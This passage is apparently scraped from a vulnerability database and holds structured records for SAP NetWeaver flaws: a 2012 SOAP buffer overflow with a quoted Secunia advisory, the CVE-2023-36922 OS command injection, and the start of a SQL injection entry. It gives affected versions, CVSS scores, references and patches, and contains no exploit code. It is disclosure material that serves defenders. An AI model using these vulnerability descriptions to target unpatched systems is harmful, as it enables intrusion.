"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201202-0362",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.02"
}
],
"sources": [
{
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0791"
},
{
"db": "BID",
"id": "52072"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nico Leidecker, Context Information Security Ltd",
"sources": [
{
"db": "BID",
"id": "52072"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29307228-1f73-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAPHostControl service has a boundary error when processing certain commands wrapped in SOAP messages. A stack-based buffer overflow can be triggered by a very long command, and a successful exploit can execute arbitrary code in the application context. SAP Netweaver is prone to a remote buffer-overflow vulnerability. Failed exploit attempts may result in a denial-of-service condition. \nSAP Netweaver 7.02 is affected; other versions may also be vulnerable. ----------------------------------------------------------------------\n\nSecunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March\nListen to our Chief Security Specialist, Research Analyst Director, and Director Product Management \u0026 Quality Assurance discuss the industry\u0027s key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver SAPHostControl Buffer Overflow Vulnerability\n\nSECUNIA ADVISORY ID:\nSA48047\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/48047/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48047\n\nRELEASE DATE:\n2012-02-20\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/48047/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/48047/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48047\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nContext Information Security has reported a vulnerability in SAP\nNetWeaver, which can be exploited by malicious people to compromise a\nvulnerable system. \n\nThe vulnerability is reported in version 7.02. \n\nSOLUTION:\nApply SAP security note 1638811. \n\nPROVIDED AND/OR DISCOVERED BY:\nNico Leidecker, Context Information Security. \n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1638811 \n\nContext Information Security:\nhttp://archives.neohapsis.com/archives/fulldisclosure/2012-02/0269.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0791"
},
{
"db": "BID",
"id": "52072"
},
{
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "109961"
}
],
"trust": 1.08
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "52072",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2012-0791",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "48047",
"trust": 0.7
},
{
"db": "IVD",
"id": "29307228-1F73-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "109961",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0791"
},
{
"db": "BID",
"id": "52072"
},
{
"db": "PACKETSTORM",
"id": "109961"
}
]
},
"id": "VAR-201202-0362",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0791"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0791"
}
]
},
"last_update_date": "2022-05-17T22:48:56.907000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP Netweaver SOAP Message Remote Buffer Overflow Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10633"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0791"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://secunia.com/advisories/48047/http"
},
{
"trust": 0.4,
"url": "https://service.sap.com/sap/support/notes/1638811"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2012/feb/268"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2012-02/0269.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48047/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://www.rsaconference.com/events/2012/usa/index.htm"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48047"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48047/#comments"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0791"
},
{
"db": "BID",
"id": "52072"
},
{
"db": "PACKETSTORM",
"id": "109961"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0791"
},
{
"db": "BID",
"id": "52072"
},
{
"db": "PACKETSTORM",
"id": "109961"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-22T00:00:00",
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
},
{
"date": "2012-02-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0791"
},
{
"date": "2012-02-17T00:00:00",
"db": "BID",
"id": "52072"
},
{
"date": "2012-02-20T06:42:10",
"db": "PACKETSTORM",
"id": "109961"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0791"
},
{
"date": "2012-02-17T00:00:00",
"db": "BID",
"id": "52072"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "52072"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver SOAP Message Remote Buffer Overflow Vulnerability",
"sources": [
{
"db": "IVD",
"id": "29307228-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0791"
},
{
"db": "BID",
"id": "52072"
}
],
"trust": 1.1
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "52072"
}
],
"trust": 0.3
}
}
var-202307-1157
Vulnerability from variot
Due to programming error in function module and report, IS-OIL component in SAP ECC and SAP S/4HANA allows an authenticated attacker to inject an arbitrary operating system command into an unprotected parameter in a common (default) extension. On successful exploitation, the attacker can read or modify the system data as well as shut down the system. SAP of SAP NetWeaver for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202307-1157",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "604"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "605"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "617"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "800"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "600"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "805"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "606"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "603"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "806"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "618"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "804"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "802"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "807"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "803"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "602"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:602:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:603:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:604:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:605:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:606:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:617:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:618:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:802:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:803:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:804:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:805:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:806:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:807:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"cve": "CVE-2023-36922",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-36922",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-36922",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "cna@sap.com",
"id": "CVE-2023-36922",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202307-683",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"db": "CNNVD",
"id": "CNNVD-202307-683"
},
{
"db": "NVD",
"id": "CVE-2023-36922"
},
{
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Due to programming error in function module and report, IS-OIL component in SAP ECC and SAP S/4HANA allows an authenticated attacker to inject an arbitrary operating system command into an unprotected parameter in a common (default) extension. \u00a0On successful exploitation, the attacker can read or modify the system data as well as shut down the system. SAP of SAP NetWeaver for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-36922"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"db": "VULMON",
"id": "CVE-2023-36922"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-36922",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021724",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202307-683",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-36922",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-36922"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"db": "CNNVD",
"id": "CNNVD-202307-683"
},
{
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"id": "VAR-202307-1157",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2024-01-21T22:53:54.235000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver ABAP Server Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=246631"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202307-683"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 1.7,
"url": "https://me.sap.com/notes/3350297"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-36922"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-36922/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-36922"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"db": "CNNVD",
"id": "CNNVD-202307-683"
},
{
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-36922"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"db": "CNNVD",
"id": "CNNVD-202307-683"
},
{
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-07-11T00:00:00",
"db": "VULMON",
"id": "CVE-2023-36922"
},
{
"date": "2024-01-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"date": "2023-07-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202307-683"
},
{
"date": "2023-07-11T03:15:10.357000",
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-07-11T00:00:00",
"db": "VULMON",
"id": "CVE-2023-36922"
},
{
"date": "2024-01-19T08:07:00",
"db": "JVNDB",
"id": "JVNDB-2023-021724"
},
{
"date": "2023-07-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202307-683"
},
{
"date": "2023-12-09T17:15:44.150000",
"db": "NVD",
"id": "CVE-2023-36922"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202307-683"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0 of \u00a0SAP\u00a0NetWeaver\u00a0 In \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-021724"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202307-683"
}
],
"trust": 0.6
}
}
var-201602-0118
Vulnerability from variot
SQL injection vulnerability in the UDDI server in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2101079
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
